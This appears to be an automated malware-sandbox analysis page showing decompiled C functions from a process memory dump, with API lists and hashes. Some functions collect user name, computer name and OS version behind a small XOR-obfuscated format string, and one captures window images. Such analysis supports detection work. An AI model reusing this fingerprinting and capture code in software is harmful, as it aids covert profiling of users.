Instruction Fuzzy Hash: 3041FF709042489AEF05CFB8D8847FEBBF8EF59304F5041A8E541B6282DB754A45DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B78F, Relevance: 13.7, APIs: 9, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00B5B78F(char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				char* _t113;
				signed int _t119;
				signed int* _t120;
				char _t122;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				char* _t129;

				_t122 = _a4;
				_v24 = _t122;
				_v20 = 0;
				if( *((intOrPtr*)(_t122 + 0xb0)) != 0 ||  *((intOrPtr*)(_t122 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00B598AF(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t122 + 0x88), _t96 << 2);
						_t124 = E00B56F1C(4);
						_t119 = 0;
						_v8 = _t124;
						E00B564B8(0);
						if(_t124 != 0) {
							 *_t124 = 0;
							_t122 = _a4;
							if( *((intOrPtr*)(_t122 + 0xb0)) == 0) {
								_t52 =  *0xb690c0; // 0xb69114
								 *_t93 = _t52;
								_t53 =  *0xb690c4; // 0xb6a6b4
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0xb690c8; // 0xb6a6b4
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0xb690f0; // 0xb69118
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0xb690f4; // 0xb6a6b8
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t119 != 0) {
									 *_t119 = 1;
								}
								goto L21;
							}
							_t120 = E00B56F1C(4);
							_v12 = _t120;
							E00B564B8(0);
							_push(_t93);
							if(_t120 != 0) {
								 *_t120 =  *_t120 & 0x00000000;
								_t121 =  *((intOrPtr*)(_t122 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t122 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t68 = E00B5EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t122);
								_t16 = _t93 + 4; // 0x4
								_t125 = _t68;
								_t126 = _t125 | E00B5EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t125,  &_v24, 1, _t121, 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t127 = _t126 | E00B5EDC5(_t93, _t121, _t126,  &_v24, 1, _t121, 0x10, _t18);
								_t128 = _t127 | E00B5EDC5(_t93, _t121, _t127,  &_v24, 2, _t121, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E00B5EDC5(_t93, _t121, _t128,  &_v24, 2, _t121, 0xf, _t22) | _t128) == 0) {
									_t113 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t113;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t113 = _t113 + 1;
												continue;
											}
											_t129 = _t113;
											do {
												_t82 = _t129 + 1;
												_t108 =  *_t82;
												 *_t129 = _t108;
												_t129 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t113 = _t107;
										goto L16;
									}
									_t119 = _v12;
									_t122 = _a4;
									goto L19;
								}
								E00B5B726(_t93);
								E00B564B8(_t93);
								E00B564B8(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00B564B8(_v8);
								return _v16;
							}
							E00B564B8();
							goto L12;
						}
						E00B564B8(_t93);
						return 1;
					}
					return 1;
				} else {
					_t119 = 0;
					_v8 = 0;
					_t93 = 0xb690c0;
					L21:
					_t59 =  *(_t122 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t122 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E00B564B8( *((intOrPtr*)(_t122 + 0x7c)));
							E00B564B8( *(_t122 + 0x88));
						}
					}
					 *((intOrPtr*)(_t122 + 0x7c)) = _v8;
					 *(_t122 + 0x80) = _t119;
					 *(_t122 + 0x88) = _t93;
					return 0;
				}
			}

0x00b5b799
0x00b5b79f
0x00b5b7a2
0x00b5b7ab
0x00b5b7ca
0x00b5b7d2
0x00b5b7d8
0x00b5b7eb
0x00b5b7ec
0x00b5b7f5
0x00b5b7f7
0x00b5b7fa
0x00b5b7fd
0x00b5b806
0x00b5b817
0x00b5b819
0x00b5b822
0x00b5b974
0x00b5b979
0x00b5b97b
0x00b5b980
0x00b5b983
0x00b5b988
0x00b5b98b
0x00b5b990
0x00b5b993
0x00b5b998
0x00b5b904
0x00b5b90a
0x00b5b90e
0x00b5b910
0x00b5b910
0x00000000
0x00b5b90e
0x00b5b82f
0x00b5b833
0x00b5b836
0x00b5b83d
0x00b5b840
0x00b5b84d
0x00b5b853
0x00b5b859
0x00b5b85b
0x00b5b85c
0x00b5b85e
0x00b5b85f
0x00b5b864
0x00b5b867
0x00b5b878
0x00b5b87a
0x00b5b88c
0x00b5b8a3
0x00b5b8a5
0x00b5b8bc
0x00b5b8e8
0x00b5b8f8
0x00b5b8f8
0x00b5b8fc
0x00000000
0x00000000
0x00b5b8ed
0x00b5b8ed
0x00b5b8f3
0x00b5b961
0x00b5b8f7
0x00b5b8f7
0x00000000
0x00b5b8f7
0x00b5b963
0x00b5b965
0x00b5b965
0x00b5b968
0x00b5b96a
0x00b5b96c
0x00b5b96e
0x00000000
0x00b5b972
0x00b5b8f5
0x00000000
0x00b5b8f5
0x00b5b8fe
0x00b5b901
0x00000000
0x00b5b901
0x00b5b8bf
0x00b5b8c5
0x00b5b8cd
0x00b5b8d5
0x00b5b8d9
0x00b5b8dd
0x00000000
0x00b5b8e5
0x00b5b842
0x00000000
0x00b5b847
0x00b5b809
0x00000000
0x00b5b811
0x00000000
0x00b5b7b5
0x00b5b7b5
0x00b5b7b7
0x00b5b7ba
0x00b5b912
0x00b5b912
0x00b5b91a
0x00b5b91c
0x00b5b91c
0x00b5b924
0x00b5b929
0x00b5b92d
0x00b5b932
0x00b5b93d
0x00b5b943
0x00b5b92d
0x00b5b947
0x00b5b94c
0x00b5b952
0x00000000
0x00b5b952

APIs

_free.LIBCMT ref: 00B5B7FD
_free.LIBCMT ref: 00B5B809
_free.LIBCMT ref: 00B5B932
_free.LIBCMT ref: 00B5B93D

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cfa00ef843a85d932c159c333bed53ea4c3b96050a3841856c57c92aa449c3ae
Instruction ID: 5d3f9a5e372a4c54f2b45defafbdb4e0662c16feddf28ad504d112d8715aec8d
Opcode Fuzzy Hash: cfa00ef843a85d932c159c333bed53ea4c3b96050a3841856c57c92aa449c3ae
Instruction Fuzzy Hash: ED61B3719007059FDB20DF64C881FAAB7F8EF44751F5441EAEE55AB281EB709D088B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B48E00, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B48E00(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t43;
				signed int _t51;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t101;
				void* _t103;
				signed int _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t94 = __edi;
				_t43 =  *0xb69014; // 0x26ce9e99
				 *(_t106 + 0x604) = _t43 ^ _t106;
				E00B4D0F0(__edi, _t106 + 0xf8, 0, 0x104);
				_t107 = _t106 + 0xc;
				E00B4D0F0(_t94, _t107 + 0x200, 0, 0x208);
				_t108 = _t107 + 0xc;
				E00B4D0F0(_t94, _t108 + 0x408, 0, 0x208);
				_t109 = _t108 + 0xc;
				 *(_t109 + 0x10) = 0x104;
				_t51 = 9;
				memset(_t109 + 0x14, 0, _t51 << 2);
				_t110 = _t109 + 0xc;
				E00B4D0F0(_t109 + 0x14 + _t51, _t110 + 0x60, 0, 0x9c);
				_t111 = _t110 + 0xc;
				GetUserNameW(_t111 + 0x204, _t111 + 0x10);
				 *(_t111 + 0x10) = 0x104;
				GetComputerNameW(_t111 + 0x40c, _t111 + 0x10);
				_t101 = E00B4ABA3(_t111 + 0x200);
				_t97 = E00B4ABA3(_t111 + 0x408);
				 *0xb6ac44(_t111 + 0x14, __edi, __esi, _t103, __ebx);
				 *(_t111 + 0x58) = 0x9c;
				GetVersionExA(_t111 + 0x58);
				asm("movaps xmm0, [0xb3dd10]");
				_t88 = 0;
				asm("movups [esp+0x38], xmm0");
				 *((intOrPtr*)(_t111 + 0x48)) = 0x2f21742c;
				 *((intOrPtr*)(_t111 + 0x4c)) = 0x722a2671;
				 *(_t111 + 0x50) = 0x3f7f253c;
				 *((char*)(_t111 + 0x54)) = 0;
				do {
					_t24 = _t88 + 0x40; // 0x40
					 *(_t111 + _t88 + 0x38) =  *(_t111 + _t88 + 0x38) ^ _t24;
					_t88 = _t88 + 1;
				} while (_t88 < 0x1c);
				_t89 = 9;
				 *((char*)(_t111 + 0x54)) = 0;
				wsprintfA(_t111 + 0x118, _t111 + 0x50,  *((intOrPtr*)(_t111 + 0x74)),  *((intOrPtr*)(_t111 + 0x74)),  *(_t111 + 0xfc) & 0x0000ffff, 0 |  *((char*)(_t111 + 0xf6)) != 0x00000001, _t97, _t101, 0 |  *((intOrPtr*)(_t111 + 0x14)) == _t89);
				_t112 = _t111 + 0x24;
				E00B50985(E00B497E3(0x9c, _t111 + 0x11c, _t97, _t101, 0x104));
				return E00B4AE43( *(_t111 + 0x638) ^ _t112);
			}

0x00b48e00
0x00b48e06
0x00b48e0d
0x00b48e29
0x00b48e2e
0x00b48e40
0x00b48e45
0x00b48e52
0x00b48e57
0x00b48e5a
0x00b48e67
0x00b48e6e
0x00b48e6e
0x00b48e75
0x00b48e7a
0x00b48e8a
0x00b48e94
0x00b48ea1
0x00b48eba
0x00b48ec1
0x00b48ec8
0x00b48ed2
0x00b48ed7
0x00b48edd
0x00b48ee4
0x00b48ee6
0x00b48eeb
0x00b48ef3
0x00b48efb
0x00b48f03
0x00b48f08
0x00b48f08
0x00b48f0b
0x00b48f0f
0x00b48f10
0x00b48f17
0x00b48f1a
0x00b48f56
0x00b48f5c
0x00b48f6c
0x00b48f8a

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B48E8A
GetComputerNameW.KERNEL32 ref: 00B48EA1

Part of subcall function 00B4ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000208,0000009C,00B48EB3), ref: 00B4ABB7
Part of subcall function 00B4ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B4ABE2

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B48EC8
GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B48ED7
wsprintfA.USER32 ref: 00B48F56

Strings

,t!/, xrefs: 00B48EEB
q&*r, xrefs: 00B48EF3

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiNameWide$ComputerInfoNativeSystemUserVersionwsprintf
String ID: ,t!/$q&*r
API String ID: 1366013575-1065670639
Opcode ID: e8479f45a3dcf9696c934792bc11f8b01e974ea432b506ee82c9c13d0c7c7393
Instruction ID: 49b77e1b4b5fc52ba7f0e9ef9ba32f035dcea3e6528ba1a0e44dc698764154a5
Opcode Fuzzy Hash: e8479f45a3dcf9696c934792bc11f8b01e974ea432b506ee82c9c13d0c7c7393
Instruction Fuzzy Hash: BC4150B24083859BD720DF60EC85BABBBECEF84354F10092DF689C3151EB7596499B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AADF, Relevance: 12.2, APIs: 8, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B5AADF(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t97;
				intOrPtr* _t98;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00B4CCD0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						L38:
						 *((intOrPtr*)(E00B55BBD())) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(_t59 == _t146) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xb6a510 - _t110; // 0x1001360
							if(__eflags != 0) {
								L14:
								_t64 =  *0xb6a510; // 0x1001360
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00B5ADEB(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00B5DE67(_t120, _t139, 4);
													E00B564B8(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00B564B8( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00B5DE67(_t139, _t138, 4);
												E00B564B8(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xb6a510 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00B598AF(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00B564B8(_t149);
													goto L40;
												} else {
													_t76 = E00B56383(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00B52919();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00B598AF(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00B55E69(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00B564B8(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00B598AF(_t53, 1);
																		E00B564B8(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00B56383( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00B52919();
																				asm("int3");
																				_t84 =  *0xb6a510; // 0x1001360
																				__eflags = _t84 -  *0xb6a51c; // 0x1001360
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0xb6a510 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														_t97 = E00B63695(_v20 + 1 + _t149 - _a4, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														__eflags = _t97;
														if(_t97 == 0) {
															_t98 = E00B55BBD();
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xb6a510 = E00B598AF(1, 4);
										E00B564B8(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xb6a510 - _t110; // 0x1001360
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xb6a514 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xb6a514 = E00B598AF(1, 4);
												E00B564B8(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xb6a514 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00B564B8(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xb6a514 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										_t108 = L00B5369A();
										__eflags = _t108;
										if(_t108 == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00B55BBD();
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00b5aadf
0x00b5aae2
0x00b5aae4
0x00b5aae8
0x00b5aaed
0x00b5ab02
0x00b5ab07
0x00b5ab09
0x00b5ab0e
0x00b5ab13
0x00b5ab15
0x00b5acf6
0x00b5acfb
0x00000000
0x00b5ab1b
0x00b5ab1b
0x00b5ab1d
0x00000000
0x00b5ab23
0x00b5ab26
0x00b5ab29
0x00b5ab2e
0x00b5ab30
0x00b5ab36
0x00b5abb3
0x00b5abb3
0x00b5abb8
0x00b5abbb
0x00b5abbd
0x00000000
0x00b5abc3
0x00b5abca
0x00b5abcf
0x00b5abd4
0x00b5abd7
0x00b5abd9
0x00b5ac2a
0x00b5ac2a
0x00b5ac2d
0x00000000
0x00b5ac33
0x00b5ac33
0x00b5ac35
0x00b5ac38
0x00b5ac38
0x00b5ac3b
0x00b5ac3d
0x00000000
0x00b5ac43
0x00b5ac43
0x00b5ac49
0x00000000
0x00b5ac4f
0x00b5ac59
0x00b5ac5c
0x00b5ac61
0x00b5ac64
0x00b5ac67
0x00b5ac69
0x00000000
0x00b5ac6f
0x00b5ac6f
0x00b5ac72
0x00b5ac74
0x00b5ac77
0x00000000
0x00b5ac77
0x00b5ac69
0x00b5ac49
0x00b5ac3d
0x00b5abdb
0x00b5abdb
0x00b5abdd
0x00000000
0x00b5abdf
0x00b5abe2
0x00b5abe8
0x00b5abeb
0x00b5abee
0x00b5ac23
0x00b5ac25
0x00b5abf0
0x00b5abf0
0x00b5abfd
0x00b5abfd
0x00b5ac00
0x00000000
0x00000000
0x00b5abf9
0x00b5abfc
0x00b5abfc
0x00b5abfc
0x00b5ac0c
0x00b5ac0f
0x00b5ac14
0x00b5ac17
0x00b5ac1a
0x00b5ac1c
0x00b5ac7b
0x00b5ac7b
0x00b5ac7b
0x00b5ac1c
0x00b5ac80
0x00b5ac83
0x00000000
0x00b5ac85
0x00b5ac85
0x00b5ac88
0x00b5ac88
0x00b5ac8a
0x00b5ac8b
0x00b5ac8b
0x00b5ac97
0x00b5ac9f
0x00b5aca2
0x00b5aca3
0x00b5aca5
0x00b5aced
0x00b5acee
0x00000000
0x00b5aca7
0x00b5acae
0x00b5acb3
0x00b5acb6
0x00b5acb8
0x00b5ad14
0x00b5ad15
0x00b5ad16
0x00b5ad17
0x00b5ad18
0x00b5ad19
0x00b5ad1e
0x00b5ad21
0x00b5ad25
0x00b5ad26
0x00b5ad29
0x00b5ad2b
0x00b5ad34
0x00b5ad36
0x00b5ad38
0x00b5ad3a
0x00b5ad3c
0x00b5ad3c
0x00b5ad3f
0x00b5ad40
0x00b5ad40
0x00b5ad3c
0x00b5ad46
0x00b5ad51
0x00b5ad54
0x00b5ad55
0x00b5ad57
0x00b5adbf
0x00b5adbf
0x00000000
0x00b5ad59
0x00b5ad59
0x00b5ad5b
0x00b5ad5d
0x00b5adaf
0x00b5adb1
0x00b5adb7
0x00000000
0x00b5ad5f
0x00b5ad5f
0x00b5ad62
0x00b5ad62
0x00b5ad64
0x00b5ad64
0x00b5ad64
0x00b5ad67
0x00b5ad67
0x00b5ad69
0x00b5ad6a
0x00b5ad6a
0x00b5ad72
0x00b5ad76
0x00b5ad80
0x00b5ad83
0x00b5ad88
0x00b5ad8b
0x00b5ad8f
0x00000000
0x00b5ad91
0x00b5ad99
0x00b5ad9e
0x00b5ada1
0x00b5ada3
0x00b5adc4
0x00b5adc6
0x00b5adc7
0x00b5adc8
0x00b5adc9
0x00b5adca
0x00b5adcb
0x00b5add0
0x00b5add1
0x00b5add6
0x00b5addc
0x00b5adde
0x00b5addf
0x00b5ade5
0x00000000
0x00b5ade5
0x00b5adea
0x00000000
0x00000000
0x00000000
0x00b5ada3
0x00000000
0x00b5ada5
0x00b5ada5
0x00b5ada8
0x00b5adaa
0x00b5adaa
0x00000000
0x00b5adae
0x00b5ad5d
0x00b5ad2d
0x00b5ad2d
0x00b5ad2d
0x00b5ad2f
0x00b5ad33
0x00b5ad33
0x00b5acba
0x00b5accb
0x00b5accf
0x00b5acd4
0x00b5acdb
0x00b5acdd
0x00b5acdf
0x00b5ace4
0x00b5ace4
0x00b5ace7
0x00b5ace7
0x00000000
0x00b5acdd
0x00b5acb8
0x00b5aca5
0x00b5ac83
0x00b5abdd
0x00b5abd9
0x00b5ab38
0x00b5ab38
0x00b5ab3b
0x00b5ab59
0x00b5ab59
0x00b5ab5c
0x00b5ab6f
0x00b5ab74
0x00b5ab79
0x00b5ab7c
0x00b5ab82
0x00b5ad01
0x00b5ad01
0x00b5ad01
0x00000000
0x00b5ab88
0x00b5ab88
0x00b5ab8e
0x00000000
0x00b5ab90
0x00b5ab9a
0x00b5ab9f
0x00b5aba4
0x00b5aba7
0x00b5abad
0x00000000
0x00000000
0x00000000
0x00000000
0x00b5abad
0x00b5ab8e
0x00b5ab5e
0x00b5ab5e
0x00b5ad04
0x00b5ad05
0x00b5ad0c
0x00000000
0x00b5ad0e
0x00b5ab3d
0x00b5ab3d
0x00b5ab43
0x00000000
0x00b5ab45
0x00b5ab45
0x00b5ab4a
0x00b5ab4c
0x00000000
0x00b5ab52
0x00b5ab52
0x00000000
0x00b5ab52
0x00b5ab4c
0x00b5ab43
0x00b5ab3b
0x00b5ab36
0x00b5ab1d
0x00b5aaef
0x00b5aaef
0x00b5aaf4
0x00b5aafa
0x00b5ad0f
0x00b5ad13
0x00b5ad13
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B5AB09
_free.LIBCMT ref: 00B5ABE2
_free.LIBCMT ref: 00B5AC0F

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 544158a1f336e511e52f0a985f1621c21a55710d537b0042c13f6d17d470f848
Instruction ID: 438e1aa90e054fcc1ec18ef4f15051fe66a879b23fe359227429f6854b3db3a6
Opcode Fuzzy Hash: 544158a1f336e511e52f0a985f1621c21a55710d537b0042c13f6d17d470f848
Instruction Fuzzy Hash: 4151B671904205AFDF21AF64DC91B6D7BF4EF01316F1443EAEE11B72C1EA758A488B92

Uniqueness

Uniqueness Score: -1.00%

Function 00B442A8, Relevance: 12.1, APIs: 8, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B442A8(void* __ebx, struct HWND__* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				struct tagRECT _v20;
				void* _v24;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				int _v56;
				struct HDC__* _v60;
				signed int _t17;
				void* _t28;
				struct HWND__* _t45;
				struct HDC__* _t47;
				void* _t48;
				struct HDC__* _t50;

				_t51 =  &_v24;
				_t17 =  *0xb69014; // 0x26ce9e99
				_v4 = _t17 ^  &_v24;
				_v24 = _a4;
				_t45 = __ecx;
				_t47 = __edx;
				GetWindowRect(__ecx,  &_v20);
				_t50 = CreateCompatibleDC(_t47);
				_t48 = CreateCompatibleBitmap(_t47, _v20.top - _v24, _v20.right - _v20.left);
				_t28 = SelectObject(_t50, _t48);
				__imp__PrintWindow(_t45, _t50, 0);
				if(_t28 != 0) {
					BitBlt(_v60, _v56, _v52, _v48 - _v56, _v44 - _v52, _t50, 0, 0, 0xcc0020);
				}
				DeleteObject(_t48);
				DeleteDC(_t50);
				return E00B4AE43(_v48 ^ _t51);
			}

0x00b442a8
0x00b442ab
0x00b442b2
0x00b442be
0x00b442c2
0x00b442c8
0x00b442ce
0x00b442db
0x00b442f6
0x00b442fa
0x00b44303
0x00b4430b
0x00b44333
0x00b44339
0x00b4433b
0x00b44342
0x00b4435c

APIs

GetWindowRect.USER32 ref: 00B442CE
CreateCompatibleDC.GDI32 ref: 00B442D5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
SelectObject.GDI32(00000000,00000000), ref: 00B442FA
PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
